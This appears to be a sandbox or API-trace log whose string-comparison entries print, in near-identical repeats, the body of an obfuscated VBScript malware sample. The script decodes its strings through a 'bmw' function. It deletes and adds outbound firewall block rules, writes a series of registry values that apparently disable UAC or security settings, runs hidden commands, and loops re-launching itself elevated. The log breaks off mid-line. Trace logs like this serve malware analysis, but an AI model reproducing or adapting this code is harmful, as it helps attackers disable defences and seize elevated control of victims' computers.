\">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.976] wcsncmp (_String1="regra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.976] wcsncmp (_String1="egra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.976] wcsncmp (_String1="gra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90 [0222.976] wcsncmp (_String1="ra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 